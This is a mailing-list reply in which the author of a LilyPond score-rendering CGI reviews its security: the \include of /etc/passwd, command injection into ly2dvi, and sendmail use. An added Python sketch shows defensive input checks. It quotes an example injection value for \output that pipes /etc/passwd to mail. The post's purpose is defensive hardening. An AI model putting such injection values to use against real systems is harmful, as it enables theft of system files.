>>>>> "Mats" == Mats Bengtsson <[EMAIL PROTECTED]> writes:

    Mats> I haven't looked much into this program, but I would suspect
    Mats> this kind of WWW application to be full of security
    Mats> holes. What happens for example if you write \include
    Mats> "/etc/passwd"; in the input file?

it checks for that, and since it can't do anything about multi-file
scores at this time anyway, it dies and gives you this message if it
finds the string "\include" in your score:

  Your score contains the word "\include", but this script is not
  capable of processing multi-file scores at this time. Sorry about
  that; you'll just have to put the whole score into a single file.

unless i'm mistaken, \include is the only way a mudela file can be
made to reach out into the environment; if i'm wrong, someone let me
know so i can protect against other abuses.

other than that, i don't think there's anything anyone can do with it,
but i'd love to hear if there's anything i need to do to lock it down
that i haven't done.  here's what's happening:

it's given this path:
/bin:/usr/bin/:/usr/lib:/home/jeff/bin

and allowed to run these programs:
/usr/bin/ly2dvi --separate
/usr/bin/dvips
/home/jeff/bin/ps-to-gifs.sh
/usr/lib/sendmail -ti


the only potential security holes i see right now are these:

1. the ability to \include files.  as i said, this is checked and
   avoided.
2. the ability to insert commands into the ly2dvi command line.  this
   is avoided simply by not offering to let the user name the mudela
   file.  each one is named "score.ly" and processed as
   "/usr/bin/ly2dvi --separate score.ly".
3. the ability to change the name of the output file with an \output
   command in the paper block, so that the resulting tex file contains
   a command, e.g.:

   \output "rondo ; mail [EMAIL PROTECTED] < /etc/passwd ; ";

   but tex just dies on this with:

   error: can't open file: `rondo ; mail [EMAIL PROTECTED] < /etc/passwd ; .tex'

4. problems inherent in using sendmail.  i've followed the cgi
   security faq guidelines on this; if anyone sees a problem with the
   way i've done it, let me know.


in case you've forgotten, the script is living for now at:

http://plaything.smart.net/cgi-bin/lilypond_cgi.pl

all suggestions always welcome.

-- 
|----------------------------------------------------------------------------|
| jeff covey [EMAIL PROTECTED] http://pobox.com/~jeff.covey/ 410-669-4926 |
|----------------------------------------------------------------------------|
|when i go into stores, they try to sell me windoze.  then i look behind the |
|counter, and they're using linux and x. what's wrong with this picture?     |
|----------------------------------------------------------------------------|
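The two input checks described in items 1 and 3 above, written out as an added illustration; this is not code from lilypond_cgi.pl (which is Perl), and the rule that an \output name must be a single plain word is an assumption, not something the post states:

```python
import re

# Constructed policy mirroring the post: the CGI only ever runs ly2dvi
# on a file it names itself, so the user never reaches the command line.
LY2DVI_ARGV = ["/usr/bin/ly2dvi", "--separate", "score.ly"]

# \output "name"; inside the paper block names the .tex file ly2dvi writes.
OUTPUT_RE = re.compile(r'\\output\s*"([^"]*)"')
# Assumed rule: an output name may only be letters, digits, '_' or '-'.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]+$")

INCLUDE_MSG = ('Your score contains the word "\\include", but this script is not '
               'capable of processing multi-file scores at this time. Sorry about '
               'that; you\'ll just have to put the whole score into a single file.')


def check_score(text):
    """Return None if the mudela text may be passed to ly2dvi, else the
    message the user should see explaining why it was refused."""
    # Item 1: a plain substring test, exactly as the post describes it.
    if "\\include" in text:
        return INCLUDE_MSG
    # Item 3: refuse any \output whose name is not a plain word, instead of
    # relying on tex failing to open the oddly named file.
    for match in OUTPUT_RE.finditer(text):
        name = match.group(1)
        if not SAFE_NAME_RE.match(name):
            return ('Your score sets \\output to "%s"; only a plain word '
                    'made of letters, digits, "_" or "-" is accepted.' % name)
    return None


def ly2dvi_argv(user_supplied_name=None):
    """Item 2: whatever name the user sends, the argument vector is fixed."""
    return list(LY2DVI_ARGV)
```

Running the argv through an exec-style call (no shell) keeps item 2 true even if the fixed vector is later extended.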

Reply via email to